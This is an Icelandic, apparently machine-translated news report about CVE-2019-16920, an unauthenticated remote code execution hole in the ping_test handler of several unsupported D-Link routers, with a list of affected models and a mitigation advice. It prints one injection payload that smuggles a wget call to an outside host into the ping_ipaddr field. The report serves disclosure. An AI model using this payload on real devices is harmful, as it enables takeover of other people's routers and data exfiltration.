Fjarnýtanleg varnarleysi í D-Link beinum

Í D-Link þráðlausum beinum greind hættulegt varnarleysi (CVE-2019–16920), sem gerir þér kleift að keyra kóða fjarstýrt á tækismegin með því að senda sérstaka beiðni til „ping_test“ meðhöndlunar, aðgengileg án auðkenningar.

Athyglisvert er að samkvæmt vélbúnaðarhönnuði ætti „ping_test“ símtalið aðeins að framkvæma eftir auðkenningu, en í raun er það kallað í öllum tilvikum, óháð innskráningu á vefviðmótið. Sérstaklega, þegar þú opnar application_sec.cgi forskriftina og sendir "action=ping_test" færibreytuna, vísar handritið á auðkenningarsíðuna, en framkvæmir á sama tíma aðgerðina sem tengist ping_test. Til að keyra kóðann var annar varnarleysi notaður í ping_test sjálfu, sem kallar á ping tólið án þess að athuga rétt IP tölu sem send var til prófunar. Til dæmis, til að hringja í wget tólið og flytja niðurstöður „echo 1234“ skipunarinnar til ytri hýsils, tilgreinirðu bara færibreytuna „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Fjarnýtanleg varnarleysi í D-Link beinum

Tilvist varnarleysisins hefur verið staðfest opinberlega í eftirfarandi gerðum:

  • DIR-655 með vélbúnaðar 3.02b05 eða eldri;
  • DIR-866L með vélbúnaðar 1.03b04 eða eldri;
  • DIR-1565 með vélbúnaðar 1.01 eða eldri;
  • DIR-652 (engar upplýsingar um erfiðar vélbúnaðarútgáfur eru veittar)

Stuðningstímabilið fyrir þessar gerðir er þegar útrunnið, svo D-Link fram, sem mun ekki gefa út uppfærslur fyrir þá til að útrýma varnarleysinu, mælir ekki með notkun þeirra og ráðleggur að skipta þeim út fyrir ný tæki. Sem öryggislausn geturðu takmarkað aðgang að vefviðmótinu við áreiðanlegar IP-tölur eingöngu.

Síðar kom í ljós að varnarleysið var líka hefur áhrif módel DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 og DIR-825, áætlanir um að gefa út uppfærslur sem ekki er vitað um.

Heimild: opennet.ru

Bæta við athugasemd